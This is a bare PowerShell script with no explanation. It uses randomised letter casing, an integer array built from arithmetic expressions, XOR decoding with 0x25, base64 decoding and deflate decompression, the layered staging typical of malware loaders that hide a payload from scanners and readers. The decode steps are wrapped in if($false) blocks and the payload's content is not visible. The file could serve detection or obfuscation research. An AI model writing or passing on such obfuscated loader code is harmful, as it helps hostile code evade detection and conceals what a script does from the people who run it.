$cSXJC =[inT[]](( 2 + 110), (36+ 56),( 39+34),(98+ 12),(83 + 22),(84+ 34), (79- 61), (99 + 8), ( 37+73),( 81+ 34), ( 3+95),( 23+59), (53+62), ( 90+ 25), (71+31), (65 +45),( 64+31), ( 69+33), (8+20),( 88+27),(31 +87), ( 10+ 86), (17+ 1),(65 +39),(71+41),(77 + 15), ( 54 -26), ( 27 + 92), ( 14+104), (69 +35), ( 47- 31),( 49 +59),(4 + 91),(15 + 81), (53 +28),( 72 + 45), ( 18+97),(18+ 100), (97 - 18), (80 +31),(10 + 108),(91+8), (83+29), ( 98- 24),( 65 +53),( 71 + 31),( 7+ 75),(63 + 17),(97- 76),( 53 + 17),( 15 +71), (4+ 82), (95 -9),(54 +43),(7 + 101), ( 95 -74),(73+31), ( 37 -9), (87+17), ( 78 + 17), (83 +21),( 21+7),( 46 + 70),( 58+ 37), (5 +99), ( 77 + 2), (5 +120),(99 + 15),(3+101), ( 94 + 1),( 58+ 58),( 63-40),(60 +52),(95-81), (87 + 21), (77 + 25),(61+ 39),(59+ 41),( 48-24), ( 92- 68))
$yVDDB= $cSXJC | Foreach-obJECT{[cHaR]($_  -bxor 0x25 )}
$yVDDB = $yVDDB -JoIN '' 
FuncTIoN siTRjFu { 
    [CMdLeTBiNDinG()]PARam( 
        [paraMETeR (vaLUEfromPIpElINE)]
        $ddxk,
        [paraMETeR(vaLUEfromPIpElINE)]
        $hoPlTv
    )
    iF ($fALSe){
         [iO.memOrystReAm] [SYsteM.COnverT]::froMbasE64sTRInG( $ddxk ) |enkO
    
    }
}
FuncTIoN enkO { 
    [ CMdLeTBiNDinG()]PARam( 
        [paraMETeR(vaLUEfromPIpElINE)]
        $GSiArTR
    )
    iF($FAlsE){
        $fGrVdQE =( new-objECt  sYstEm.io.StREAmREADER( ( new-objECt  SYstEM.Io.COmprEsSIOn.deFlATestReAm( $GSiArTR,[sySTEm.io.CoMpREssIoN.COMPResSiOnMOdE]::DeComPreSs ) ),[sYSTeM.teXT.enCoDiNG]::ASCii)).ReAdTOEnd()
    
    }
}
siTRjFu -ddxk $yVDDB -hoPlTv 'RoAOkRk'

